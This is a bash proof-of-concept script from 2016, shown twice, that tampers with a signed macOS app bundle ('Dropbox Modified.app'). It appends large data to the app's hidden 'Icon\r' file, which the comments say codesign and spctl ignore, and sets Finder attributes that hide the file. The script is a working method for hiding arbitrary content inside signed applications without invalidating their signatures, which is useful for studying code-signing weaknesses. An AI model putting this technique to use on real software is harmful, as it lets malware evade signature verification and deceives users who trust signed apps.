libcrack/osx-signature-hidden-data.sh

## osx-signature-hidden-data.sh
#!/usr/bin/env bash
# root@libcrack.so
# Thu Aug 18 07:10:58 CEST 2016
#
# The file Icon\r is supposed to hold a user-provided icon for the app.
# Because Icon\r is totally ignored by codesign (and spctl) this makes it
# possible to hide any amount of datas inside.
#
# The Icon\r is by default hidden and inaccessible from the Finder so I
# reproduced the same behaviour by setting the hidden flag and copied the
# same very special extended attribute that makes the file inaccessible
# from the Finder “iconMACS@”:
#   (69636F6E4D414353401000000000000000000000000000000000000000000000)
#
# https://gist.github.com/pwnsdx/584ccf0a9a2d36e5e77efdb55d66e8ed/raw/6d98c58fdffca56b20397f3a8f512280d67f964e/poc.sh
# https://medium.com/@sabrihaddouche/how-a-malware-can-infects-digitally-signed-files-without-altering-hashes-on-macos-c7dc9e391a8e#.rji8bg8i8
#

VAL="69636F6E4D414353401000000000000000000000000000000000000000000000"
ICON="Icon$(printf "\r")"
# APPDIR="$1"
APP="Dropbox Modified.app"
APPDIR="/Users/$USER/Desktop/$APP"

if [ -z "$APPDIR" ]; then
    printf "\e[0;31m[x]\e[0m Usage: $0 <app dir>\n"
    exit 1
fi

if [ ! -d "$APPDIR" ]; then
    printf "\e[0;31m[x]\e[0m No such dir: \"$APPDIR\"\n"
    exit 2
fi

# cd "$APPDIR" && \
# echo "$(openssl rand -base64 52428800)" >> "$ICON" && \

cd "$APPDIR" && \
openssl rand -base64 52428800 >> "$ICON" && \
chflags hidden "$ICON" && \
xattr -wx com.apple.FinderInfo "$VAL" "$ICON" \
    && printf "\e[0;32m[+]\e[0m Tampered \"$APPDIR\"\n" \
    || printf "\e[0;31m[x]\e[0m Failed to tamper \"$APPDIR\"\n"

exit $?
	#!/usr/bin/env bash
	# root@libcrack.so
	# Thu Aug 18 07:10:58 CEST 2016
	#
	# The file Icon\r is supposed to hold a user-provided icon for the app.
	# Because Icon\r is totally ignored by codesign (and spctl) this makes it
	# possible to hide any amount of datas inside.
	#
	# The Icon\r is by default hidden and inaccessible from the Finder so I
	# reproduced the same behaviour by setting the hidden flag and copied the
	# same very special extended attribute that makes the file inaccessible
	# from the Finder “iconMACS@”:
	# (69636F6E4D414353401000000000000000000000000000000000000000000000)
	#
	# https://gist.github.com/pwnsdx/584ccf0a9a2d36e5e77efdb55d66e8ed/raw/6d98c58fdffca56b20397f3a8f512280d67f964e/poc.sh
	# https://medium.com/@sabrihaddouche/how-a-malware-can-infects-digitally-signed-files-without-altering-hashes-on-macos-c7dc9e391a8e#.rji8bg8i8
	#

	VAL="69636F6E4D414353401000000000000000000000000000000000000000000000"
	ICON="Icon$(printf "\r")"
	# APPDIR="$1"
	APP="Dropbox Modified.app"
	APPDIR="/Users/$USER/Desktop/$APP"

	if [ -z "$APPDIR" ]; then
	printf "\e[0;31m[x]\e[0m Usage: $0 <app dir>\n"
	exit 1
	fi

	if [ ! -d "$APPDIR" ]; then
	printf "\e[0;31m[x]\e[0m No such dir: \"$APPDIR\"\n"
	exit 2
	fi

	# cd "$APPDIR" && \
	# echo "$(openssl rand -base64 52428800)" >> "$ICON" && \

	cd "$APPDIR" && \
	openssl rand -base64 52428800 >> "$ICON" && \
	chflags hidden "$ICON" && \
	xattr -wx com.apple.FinderInfo "$VAL" "$ICON" \
	&& printf "\e[0;32m[+]\e[0m Tampered \"$APPDIR\"\n" \
	\|\| printf "\e[0;31m[x]\e[0m Failed to tamper \"$APPDIR\"\n"

	exit $?